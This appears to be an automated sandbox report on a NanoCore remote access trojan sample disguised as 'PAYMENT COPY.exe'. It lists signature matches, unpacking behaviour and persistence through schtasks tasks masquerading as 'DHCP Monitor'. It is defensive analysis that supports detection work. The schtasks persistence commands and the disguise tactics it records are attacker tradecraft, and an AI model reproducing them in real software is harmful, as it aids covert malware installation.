    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.6f0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6f0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.754c9f.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.754c9f.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.6b0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6b0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.22fba98.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.22fba98.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.660000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.660000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.700000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.700000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
    Source: classification engineClassification label: mal100.troj.evad.winEXE@16/24@13/1
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_00403486
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404763
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_72C34239 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_72C34239
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,1_2_00401489
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_01
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bed38ea9-13ae-4999-bfd6-9ec5f9de3405}
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsxD869.tmpJump to behavior
    Source: PAYMENT COPY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: PAYMENT COPY.exeReversingLabs: Detection: 35%
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile read: C:\Users\user\Desktop\PAYMENT COPY.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
    Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp'
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpF23B.tmp'
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' 0
    Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' 0
    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpEEDF.tmp'Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpF23B.tmp'Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' 0Jump to behavior
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: PAYMENT COPY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000000.00000003.237791410.0000000002B20000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000007.00000003.251492752.0000000002C40000.00000004.00000001.sdmp, dhcpmon.exe, 0000000E.00000003.274760299.0000000002C30000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, 00000000.00000003.237791410.0000000002B20000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000007.00000003.251492752.0000000002C40000.00000004.00000001.sdmp, dhcpmon.exe, 0000000E.00000003.274760299.0000000002C30000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: PAYMENT COPY.exe, 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: PAYMENT COPY.exe, 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmp

    Data Obfuscation:

    barindex
    Detected unpacking (changes PE section rights)Show sources
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 1.2.PAYMENT COPY.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 8.2.PAYMENT COPY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 15.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
    Detected unpacking (overwrites its own PE header)Show sources
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 1.2.PAYMENT COPY.exe.400000.1.unpack
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 8.2.PAYMENT COPY.exe.400000.0.unpack
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 15.2.dhcpmon.exe.400000.1.unpack
    .NET source code contains potential unpackerShow sources
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_73581A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_73581A98
    Source: ri8clfcgml62un.dll.0.drStatic PE information: section name: .code
    Source: ri8clfcgml62un.dll.7.drStatic PE information: section name: .code
    Source: ri8clfcgml62un.dll.14.drStatic PE information: section name: .code
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_73582F60 push eax; ret 0_2_73582F8E
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401F16 push ecx; ret 1_2_00401F29
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_00401F16 push ecx; ret 1_1_00401F29
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_00401F16 push ecx; ret 8_2_00401F29
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_051C7648 push eax; iretd 8_2_051C7649
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_00401F16 push ecx; ret 15_2_00401F29
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_05097648 push eax; iretd 15_2_05097649
    Source: initial sampleStatic PE information: section name: .data entropy: 7.6178797985
    Source: initial sampleStatic PE information: section name: .data entropy: 7.6178797985
    Source: initial sampleStatic PE information: section name: .data entropy: 7.6178797985
